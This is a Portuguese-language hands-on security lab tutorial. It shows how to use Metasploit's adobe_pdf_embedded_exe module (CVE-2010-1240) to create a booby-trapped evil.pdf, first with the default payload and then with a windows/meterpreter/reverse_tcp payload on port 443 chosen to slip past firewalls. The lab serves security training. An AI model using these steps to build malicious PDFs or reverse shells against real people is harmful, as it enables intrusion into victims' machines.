Introdução
Neste laboratório, exploraremos como aproveitar a vulnerabilidade do módulo embutido no Adobe PDF para injetar um backdoor no Windows. O processo do laboratório envolve a transmissão de um arquivo PDF contendo um backdoor para um host Windows, que infectará o sistema Windows alvo quando o proprietário abrir o arquivo PDF usando o Adobe Reader.
O ambiente de laboratório fornecido pela LabEx não possui uma máquina virtual Windows, portanto, não podemos verificar a eficácia do ataque. O processo do laboratório demonstrará apenas como embutir o programa backdoor.
Além disso, você não precisa iniciar uma máquina alvo neste laboratório. Você só precisa iniciar o ambiente Kali Linux, e o arquivo PDF criado com sucesso será colocado no diretório /root/ do host Kali.
Iniciar o Console do Metasploit Framework
Agora você iniciará a máquina de ataque (container Kali Linux) e a máquina alvo (máquina virtual Metasploitable2) para o experimento.
- Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2
Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.
- Teste a conectividade com a máquina alvo fazendo ping nela:
ping 192.168.122.102
Pressione Ctrl+C para parar o ping.
- Inicie o container Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
- Dentro do container Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102
Pressione Ctrl+C para parar o ping.
Agora, tanto a máquina de ataque quanto a máquina alvo estão em execução, e você pode iniciar o teste de penetração.
Observação: Se você sair acidentalmente do bash atual, o container Kali será interrompido automaticamente. Você pode executar docker run -ti --network host b5b709a49cd5 bash novamente no host para iniciar um novo container Kali e entrar no bash para continuar o experimento.
No container Kali Linux, insira os seguintes comandos no terminal bash do Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole
Isso iniciará o serviço de banco de dados PostgreSQL, inicializará o banco de dados e iniciará o Console do Metasploit Framework (msfconsole) para operações adicionais.
Usar o Módulo de Exploit
No msfconsole, execute o seguinte comando para usar o módulo exploit:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Isso carregará o módulo exploit adobe_pdf_embedded_exe, que nos permite embutir uma carga útil executável em um arquivo PDF.
Use o comando show options para visualizar as opções configuráveis para o módulo exploit:
show options
Isso exibirá as opções disponíveis, como:
EXENAME: O caminho para o arquivo executável a ser embutido no PDF.FILENAME: O nome do arquivo PDF de saída (padrão:evil.pdf).INFILENAME: O caminho completo para o arquivo PDF de entrada (padrão: um arquivo PDF embutido).LAUNCH_MESSAGE: A mensagem de prompt para enganar o usuário a executar o executável embutido.
Você pode deixar a maioria das opções com seus valores padrão, mas pode querer definir a opção INFILENAME para especificar o caminho para o arquivo PDF de entrada que você deseja infectar.
Após configurar as opções, use o comando exploit para executar o ataque:
exploit
Isso embutirá a carga útil no arquivo PDF de entrada especificado e gerará um novo arquivo PDF com o executável embutido.
Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção
Examinar a Saída
Após executar o exploit, o arquivo PDF gerado contendo a carga útil maliciosa estará localizado em /root/.msf4/local/evil.pdf. Você pode sair do msfconsole e examinar o arquivo:
ls -l /root/.msf4/local/evil.pdf
Você deve observar um aumento no tamanho do arquivo, indicando a presença do executável embutido. Quando o arquivo PDF for aberto, ele exibirá a mensagem de lançamento configurada, solicitando que o usuário clique e execute o programa embutido.
Definir um Payload Personalizado
Para tornar o PDF infectado mais valioso, podemos definir uma carga útil personalizada para ele.
Reentre no msfconsole:
cd ~
msfconsole
No msfconsole, siga os passos anteriores para selecionar o módulo de ataque:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Desta vez, usaremos a carga útil windows/meterpreter/reverse_tcp, que é um backdoor Meterpreter que estabelece uma conexão TCP do host comprometido de volta para a máquina do atacante, permitindo acesso direto ao sistema comprometido. Você pode usar o comando show payloads para visualizar e selecionar outras cargas úteis, se desejar.
Defina a carga útil windows/meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp
Configure a carga útil especificando o endereço IP e a porta do seu host Kali para receber a conexão de entrada. Certifique-se de que o host de destino possa se conectar ao seu host Kali:
set lhost 192.168.122.1
Usar a porta 443 pode ajudar a contornar alguns firewalls:
set lport 443
Em seguida, use o comando exploit para gerar o PDF malicioso:
exploit
Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção
Examinar a Saída Novamente
Verifique o tamanho do arquivo PDF gerado:
ls -l /root/.msf4/local/evil.pdf
Você deve notar que o tamanho do arquivo é menor do que com a carga útil padrão, pois a carga útil windows/meterpreter/reverse_tcp é mais compacta.
Resumo
Neste laboratório, aprendemos como aproveitar a vulnerabilidade do Adobe Reader (CVE-2010-1240) que falha ao validar o conteúdo embutido em arquivos PDF. Ao embutir um programa backdoor em um arquivo PDF e enganar o usuário para que o execute, podemos obter acesso ao host Windows de destino. Os principais pontos abordados neste laboratório incluem:
- Comandos básicos do Linux
- Operações do console do Metasploit Framework
- Introdução à vulnerabilidade Adobe PDF Embedded EXE (CVE-2010-1240)
- Como explorar a vulnerabilidade e embutir um programa backdoor
O laboratório proporcionou experiência prática na criação de arquivos PDF maliciosos com cargas úteis embutidas, na configuração de diferentes opções e na compreensão do impacto de diferentes cargas úteis no tamanho do arquivo. Este conhecimento pode ser útil para entender e mitigar tais ataques em cenários do mundo real.



